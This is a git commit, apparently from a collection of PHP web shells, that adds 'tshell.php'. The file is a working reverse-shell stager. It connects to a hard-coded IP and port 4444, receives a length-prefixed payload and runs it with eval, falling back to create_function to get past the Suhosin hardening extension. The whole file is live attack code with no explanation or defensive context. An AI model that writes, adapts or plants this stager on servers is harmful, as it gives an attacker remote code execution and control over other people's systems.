Merge pull request #13 from 409H/patch-3

php: add tshell.php
2024-11-10 06:14:16 +00:00 · 2019-02-19 20:42:06 +01:00 · 2019-02-19 20:42:06 +01:00 · 2a48acc802
commit 2a48acc802
parent 3d6d27cd50 d63289b993
1 changed files with 87 additions and 0 deletions
--- a/php/tshell.php
+++ b/php/tshell.php
@ -0,0 +1,87 @@
+<?php /**/
+error_reporting(0);
+$ip = '10.10.15.6';
+$port = 4444;
+
+if (($f = 'stream_socket_client') && is_callable($f))
+	{
+	$s = $f("tcp://{$ip}:{$port}");
+	$s_type = 'stream';
+	}
+
+if (!$s && ($f = 'fsockopen') && is_callable($f))
+	{
+	$s = $f($ip, $port);
+	$s_type = 'stream';
+	}
+
+if (!$s && ($f = 'socket_create') && is_callable($f))
+	{
+	$s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
+	$res = @socket_connect($s, $ip, $port);
+	if (!$res)
+		{
+		die();
+		}
+
+	$s_type = 'socket';
+	}
+
+if (!$s_type)
+	{
+	die('no socket funcs');
+	}
+
+if (!$s)
+	{
+	die('no socket');
+	}
+
+switch ($s_type)
+	{
+case 'stream':
+	$len = fread($s, 4);
+	break;
+
+case 'socket':
+	$len = socket_read($s, 4);
+	break;
+	}
+
+if (!$len)
+	{
+	die();
+	}
+
+$a = unpack("Nlen", $len);
+$len = $a['len'];
+$b = '';
+
+while (strlen($b) < $len)
+	{
+	switch ($s_type)
+		{
+	case 'stream':
+		$b.= fread($s, $len - strlen($b));
+		break;
+
+	case 'socket':
+		$b.= socket_read($s, $len - strlen($b));
+		break;
+		}
+	}
+
+$GLOBALS['msgsock'] = $s;
+$GLOBALS['msgsock_type'] = $s_type;
+
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
+	{
+	$suhosin_bypass = create_function('', $b);
+	$suhosin_bypass();
+	}
+  else
+	{
+	eval($b);
+	}
+
+die();